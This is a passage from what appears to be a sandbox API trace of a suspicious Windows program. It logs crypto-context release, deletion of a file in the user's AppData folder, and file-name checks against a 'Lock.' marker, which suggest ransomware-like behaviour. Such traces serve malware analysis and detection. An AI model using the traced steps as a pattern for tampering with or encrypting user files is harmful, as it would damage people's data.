wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.366] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.366] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.366] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.366] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.366] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.366] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.367] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.367] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.367] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.367] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.367] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.367] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.367] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.367] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.367] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.367] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.367] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.367] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.368] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.368] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.368] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.368] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.368] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.368] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0149.369] CryptReleaseContext (hProv=0x9bf440, dwFlags=0x0) returned 1 [0149.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.369] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.369] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.369] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.369] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.369] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0149.369] FreeLibrary (hLibModule=0x76390000) returned 1 [0149.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.369] CloseHandle (hObject=0x4ec) returned 1 [0149.370] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.370] CloseHandle (hObject=0x4fc) returned 1 [0149.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.375] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.375] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.375] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.375] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/nst7Asd C.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png", lpFilePart=0x8cedf4*="nst7Asd C.png") returned 0x2d [0149.375] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nst7asd c.png")) returned 0x20 [0149.375] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21139bb0, ftCreationTime.dwHighDateTime=0x1d5d618, ftLastAccessTime.dwLowDateTime=0xd776c210, ftLastAccessTime.dwHighDateTime=0x1d5d744, ftLastWriteTime.dwLowDateTime=0xd776c210, ftLastWriteTime.dwHighDateTime=0x1d5d744, nFileSizeHigh=0x0, nFileSizeLow=0xc550, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="nst7Asd C.png", cAlternateFileName="NST7AS~1.PNG")) returned 0x9e1e78 [0149.375] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nst7asd c.png")) returned 1 [0149.381] FindNextFileW (in: hFindFile=0x9e1e78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21139bb0, ftCreationTime.dwHighDateTime=0x1d5d618, ftLastAccessTime.dwLowDateTime=0xd776c210, ftLastAccessTime.dwHighDateTime=0x1d5d744, ftLastWriteTime.dwLowDateTime=0xd776c210, ftLastWriteTime.dwHighDateTime=0x1d5d744, nFileSizeHigh=0x0, nFileSizeLow=0xc550, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="nst7Asd C.png", cAlternateFileName="NST7AS~1.PNG")) returned 0 [0149.381] FindClose (in: hFindFile=0x9e1e78 | out: hFindFile=0x9e1e78) returned 1 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.381] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0149.382] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.382] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0149.383] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/nst7Asd C.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png", lpFilePart=0x8cf650*="nst7Asd C.png") returned 0x2d [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.383] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\nst7Asd C.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nst7asd c.png")) returned 0xffffffff [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.384] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.384] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.384] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.384] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NWn0_eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wn0_eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0_eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0_eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eXN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XN3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pgA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gA63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="63Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0149.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ym.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.385] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.385] 